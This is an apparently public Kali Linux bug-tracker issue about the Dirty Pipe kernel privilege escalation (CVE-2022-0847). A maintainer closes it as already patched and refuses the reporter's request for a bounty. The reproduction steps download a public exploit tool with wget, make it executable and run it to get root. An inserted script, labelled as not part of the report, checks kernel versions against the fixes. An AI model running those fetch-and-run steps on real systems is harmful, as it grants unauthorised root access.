View Issue Details
ID | Project | Category | View Status | Date Submitted | Last Update |
---|---|---|---|---|---|
0007616 | Kali Linux | [All Projects] General Bug | public | 2022-03-11 19:45 | 2022-03-12 09:10 |
Reporter | himanshu725 | Assigned To | daniruiz | ||
Priority | urgent | Severity | major | Reproducibility | always |
Status | resolved | Resolution | fixed | ||
Product Version | 2022.1 | ||||
Target Version | Fixed in Version | 2022.2 | |||
Summary | 0007616: Kali Linux all Versions is Vulnerable to CVE 2022-0847 | Direct Privilege Escalation | ||||
Description | CVE-2022-0847 is a privilege escalation vulnerability discovered by Max Kellermann, present in the Linux kernel itself post version 5.8, which allows overwriting data in arbitrary read-only files or, in simpler words, lets unprivileged processes inject code into privileged/root processes, thus escalating privileges. The original post with intricate work and details can be found here: https://dirtypipe.cm4all.com/ | ||||
Steps To Reproduce | 1. Log in as any normal user that doesn't have superuser functionality. 2. Download an exploit from GitHub with the help of the wget utility: wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64 3. Give all permissions to the downloaded file: chmod 777 traitor-amd64 4. Finally, execute it with ./traitor-amd64 and it gives you this type of output: [+] Assessing machine state... [+] Checking for opportunities... [+][kernel:CVE-2022-0847] Kernel version 5.15.0 is vulnerable! 5. Now, at last, you need to exploit this vulnerability: ./traitor-amd64 --exploit kernel:CVE-2022-0847 6. BOOM!!!! You are successfully logged in as the ROOT user, without the root password. Do anything as the root user. | ||||
Additional Information | ##Background of Vulnerability Max came to know of the vulnerability after he tried to resolve unprecedented CRC errors in access logs. Many consumers of cm4all.com were reporting that monthly access logs, even though downloadable, couldn’t be decompressed and were throwing errors. Max explains in his post how he has used the Z_SYNC_FLUSH mechanism along with splicing to concatenate daily log files into monthly ZIP archives available to be downloaded over HTTP. Upon closer examination, he reached the root problem. ##Mitigations The vulnerability was fixed in Linux 5.16.11, 5.15.25 and 5.10.102. ##Reference https://dirtypipe.cm4all.com/ | ||||
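
A version check a defender could run against the fixed releases listed under Mitigations, as an added example that is not part of the original report. The function names are hypothetical and the sample strings are constructed; it assumes a Debian-style kernel, where `uname -r` carries only the ABI name (such as the `5.15.0` printed in the tool output above) while the packaged upstream version appears in `uname -v`.

```shell
#!/bin/sh
# Added example (not from the report). Fixed releases are the ones the report
# lists: 5.16.11, 5.15.25, 5.10.102; the bug is described as present since 5.8.

# ver_num "5.15.0-kali3-amd64" -> 5015000 (suffix after the dotted number dropped)
ver_num() {
    num=${1%%[!0-9.]*}
    IFS=. read -r maj min pat rest <<EOF
$num
EOF
    echo $(( ${maj:-0} * 1000000 + ${min:-0} * 1000 + ${pat:-0} ))
}

# dirtypipe_status VERSION -> not-affected | vulnerable | fixed | unknown
dirtypipe_status() {
    case $1 in [0-9]*.[0-9]*) ;; *) echo unknown; return 0 ;; esac
    n=$(ver_num "$1")
    case $(( n / 1000 )) in            # MAJOR*1000 + MINOR selects the series
        5010) fix=5010102 ;;
        5015) fix=5015025 ;;
        5016) fix=5016011 ;;
        *)    fix= ;;                  # no fixed release listed for this series
    esac
    if [ "$n" -lt 5008000 ]; then echo not-affected
    elif [ -n "$fix" ] && [ "$n" -ge "$fix" ]; then echo fixed
    # Assumption: final releases of series after 5.16 already contain the fix.
    elif [ "$n" -ge 5017000 ]; then echo fixed
    else echo vulnerable
    fi
}

# Assumption: Debian-style `uname -v`, e.g. "#1 SMP Debian 5.16.11-1kali1 (...)".
pkg_version() {
    echo "$1" | sed -n 's/.*Debian \([0-9][0-9.]*\).*/\1/p'
}

# check_kernel "<uname -r>" "<uname -v>": prefer the packaged upstream version,
# fall back to the release string when `uname -v` has no Debian version in it.
check_kernel() {
    pkg=$(pkg_version "$2")
    dirtypipe_status "${pkg:-$1}"
}

# Classify the running host.
echo "CVE-2022-0847: $(check_kernel "$(uname -r)" "$(uname -v)")"
```

A distribution may backport the fix into a package whose version is below these numbers, so treat `vulnerable` as a prompt to check the package changelog rather than as proof.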
|
This is already fixed in the latest kernel version |
|
Thank you for your response. But I reported now. I reported first this issue of Kali Linux versions. Latest versions take time. That means you need to at least give a monetary reward or hall of fame, or anything like that which appreciates security researchers to report vulnerabilities in future. Thanks, Himanshu Sharma |
|
Thank you for your response. But I reported now. I reported first this issue of Kali Linux versions. Latest versions take time. That means you need to at least give a monetary reward or hall of fame, or anything like that which appreciates security researchers to report vulnerabilities in future. Thanks, Himanshu Sharma |
|
You reported a known issue that was already patched days ago and you expect a monetary reward? For using an automated script that you found online? You have to be kidding. |
Date Modified | Username | Field | Change |
---|---|---|---|
2022-03-11 19:45 | himanshu725 | New Issue | |
2022-03-11 19:45 | himanshu725 | File Added: POC_1.png | |
2022-03-11 19:45 | himanshu725 | File Added: POC_2.png | |
2022-03-11 19:45 | himanshu725 | File Added: POC_3.png | |
2022-03-11 19:50 | daniruiz | Note Added: 0015868 | |
2022-03-11 19:50 | daniruiz | Assigned To | => daniruiz |
2022-03-11 19:50 | daniruiz | Status | new => resolved |
2022-03-11 19:50 | daniruiz | Resolution | open => fixed |
2022-03-11 19:50 | daniruiz | Fixed in Version | => 2022.2 |
2022-03-11 20:18 | himanshu725 | Status | resolved => feedback |
2022-03-11 20:18 | himanshu725 | Resolution | fixed => reopened |
2022-03-11 20:18 | himanshu725 | Note Added: 0015869 | |
2022-03-11 20:19 | himanshu725 | Note Added: 0015870 | |
2022-03-11 20:19 | himanshu725 | Status | feedback => assigned |
2022-03-11 20:23 | daniruiz | Note Added: 0015871 | |
2022-03-11 20:23 | daniruiz | Status | assigned => resolved |
2022-03-11 20:23 | daniruiz | Resolution | reopened => fixed |
2022-03-11 20:29 | himanshu725 | Status | resolved => feedback |
2022-03-11 20:29 | himanshu725 | Resolution | fixed => reopened |
2022-03-11 20:37 | daniruiz | Status | feedback => resolved |
2022-03-11 20:43 | himanshu725 | Status | resolved => feedback |
2022-03-12 09:10 | daniruiz | Status | feedback => resolved |
2022-03-12 09:10 | daniruiz | Resolution | reopened => fixed |